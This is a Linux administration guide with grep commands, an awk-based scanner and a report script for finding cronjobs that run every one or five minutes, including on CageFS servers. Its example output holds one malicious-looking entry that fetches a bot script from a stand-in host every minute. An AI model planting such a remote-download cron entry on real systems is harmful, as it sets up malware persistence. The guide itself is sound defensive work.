Cronjobs scheduled to run every 1 minute (* * * * *) or every 5 minutes (*/5 * * * *) can cause performance issues or be used by malicious scripts, so it’s important to detect and review them.
This guide explains how to locate such entries using a grep command.
📍 Location of Cronjobs
On a typical Linux system with crond, user cronjobs are stored in:
/var/spool/cron/
Each file in that directory is named after the user who owns the cronjobs.
🔍 Command to Find Cronjobs Running Every 1 or 5 Minutes
grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/*
✅ What This Does:
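- ^([^[:space:]]+)?/5 → Matches schedules like */5, 1/5, 0/5 (common for 5-min jobs).
- ^([^[:space:]]+)?/1 → Matches any job running every minute (*/1, 0/1, etc).
- ^\* → Matches literal asterisk-only patterns like * * * * * (every minute).
- Searches all user cronjobs in /var/spool/cron/.
- These are prefix matches, so other intervals whose minute field starts the same way (for example */10 or */15) also appear in the output; check the minute field of each hit.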
🧪 Example Output
/var/spool/cron/root:*/5 * * * * /usr/local/bin/php /home/user/script.php
/var/spool/cron/admin:* * * * * /usr/bin/wget http://malicious.example.com/bot.sh
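The grep patterns above match on text, so this added example (not part of the original guide) shows a stricter check: it expands the minute field of each entry and reports only fields that really fire every minute or every 5 minutes, including ranges and explicit lists. The function names and the sample crontab are constructed for illustration, and reading "N/S" as "from N to 59 in steps of S" is an assumption.

```bash
#!/usr/bin/env bash
# Added example, not from the original guide. Assumption: "N/S" (as in 0/5)
# is read as "from minute N to 59 in steps of S".
# awk function interval(f): expands a crontab minute field and returns 1
# (fires all 60 minutes), 5 (12 minutes spaced 5 apart) or 0 (anything else).
CRON_AWK='
function interval(f,   parts, s, r, seen, n, i, p, step, has, lo, hi, m, cnt, res) {
  n = split(f, parts, ",")
  for (i = 1; i <= n; i++) {
    p = parts[i]
    if (p !~ "^(\\*|[0-9]+(-[0-9]+)?)(/[0-9]+)?$") return 0
    step = 1; has = (split(p, s, "/") == 2)
    if (has) { p = s[1]; step = s[2] + 0 }
    if (step < 1) return 0
    if (p == "*") { lo = 0; hi = 59 }
    else if (split(p, r, "-") == 2) { lo = r[1] + 0; hi = r[2] + 0 }
    else { lo = p + 0; hi = has ? 59 : lo }
    for (m = lo; m <= hi && m <= 59; m += step) if (!(m in seen)) { seen[m] = 1; cnt++ }
  }
  if (cnt == 60) return 1
  if (cnt != 12) return 0
  res = -1   # all 12 minutes must share one remainder mod 5
  for (m in seen) { if (res < 0) res = m % 5; if (m % 5 != res) return 0 }
  return 5
}
'

# classify_minute FIELD -> prints 1, 5 or 0
classify_minute() { awk -v f="$1" "$CRON_AWK"'BEGIN { print interval(f) }'; }

# scan_crontabs FILE... -> prints "FILE:every Nmin:LINE" for each hit
scan_crontabs() {
  awk "$CRON_AWK"'
    /^[ \t]*(#|$)/ { next }   # skip comments and blank lines
    { n = interval($1); if (n) printf "%s:every %dmin:%s\n", FILENAME, n, $0 }
  ' "$@"
}

# Constructed sample crontab for trying the scanner (not real data)
sample_crontab() {
  cat <<'EOF'
MAILTO=root
*/5 * * * * /usr/local/bin/php /home/user/script.php
*/10 * * * * /usr/bin/true
0-59 * * * * /usr/bin/true
0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/bin/true
EOF
}
if [ "$#" -gt 0 ]; then scan_crontabs "$@"; fi
```

Pass the crontab files as arguments, for example /var/spool/cron/* /etc/crontab /etc/cron.d/*; system crontabs carry an extra user column, but the minute is still the first field.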
🛡️ Pro Tips
- Always check for unexpected or suspicious scripts, especially those pulling from external sources or using obfuscated commands.
- Also review crontabs under /etc/cron.d/, /etc/crontab, and systemd timers for completeness:
grep -Ei '^\*|/5|/1' /etc/crontab /etc/cron.d/*
📦 Optional Script for Report
echo "Scanning for 1 and 5 minute cronjobs..."
grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/* > /root/cronjobs_1_5_min.txt
echo "Results saved to /root/cronjobs_1_5_min.txt"
Here is a ready-to-use Bash script to find cronjobs running every 1 or 5 minutes for all users, including those jailed in CageFS (e.g., on CloudLinux/cPanel servers):
📄 Script: find_1_5_min_cronjobs.sh
#!/bin/bash
# File to store the report
OUTPUT_FILE="/root/cronjobs_1_5_min_report.txt"

# Start fresh
echo "Scanning for cronjobs scheduled every 1 or 5 minutes..." > "$OUTPUT_FILE"
echo "=======================================================" >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 1. Scan /var/spool/cron (standard user crontabs)
echo "[User Cronjobs - /var/spool/cron/]" >> "$OUTPUT_FILE"
grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' /var/spool/cron/* >> "$OUTPUT_FILE" 2>/dev/null || echo "None found." >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 2. Scan /etc/crontab and /etc/cron.d/ (system-wide cronjobs)
echo "[System Cronjobs - /etc/crontab and /etc/cron.d/]" >> "$OUTPUT_FILE"
grep -Ei '^\*|/5|/1' /etc/crontab /etc/cron.d/* >> "$OUTPUT_FILE" 2>/dev/null || echo "None found." >> "$OUTPUT_FILE"
echo "" >> "$OUTPUT_FILE"

# 3. Optional: Scan inside CageFS users (CloudLinux)
# cagefsctl is an executable file, so test it with -x (a -d directory test never succeeds here)
if [ -x /usr/sbin/cagefsctl ]; then
    echo "[CageFS Cronjobs]" >> "$OUTPUT_FILE"
    # Iterate over the crontab files directly instead of parsing ls output
    for cronfile in /var/spool/cron/*; do
        [ -f "$cronfile" ] || continue
        user=$(basename "$cronfile")
        if cagefsctl --user-status "$user" 2>/dev/null | grep -q 'enabled'; then
            echo "User: $user" >> "$OUTPUT_FILE"
            grep -Ei '^([^[:space:]]+)?/5|^([^[:space:]]+)?/1|^\*' "$cronfile" >> "$OUTPUT_FILE" 2>/dev/null || echo " None found." >> "$OUTPUT_FILE"
            echo "" >> "$OUTPUT_FILE"
        fi
    done
    echo "" >> "$OUTPUT_FILE"
fi

echo "Scan complete. Results saved to: $OUTPUT_FILE"
✅ Instructions
- Save as /root/find_1_5_min_cronjobs.sh
- Make it executable:
chmod +x /root/find_1_5_min_cronjobs.sh
- Run the script:
/root/find_1_5_min_cronjobs.sh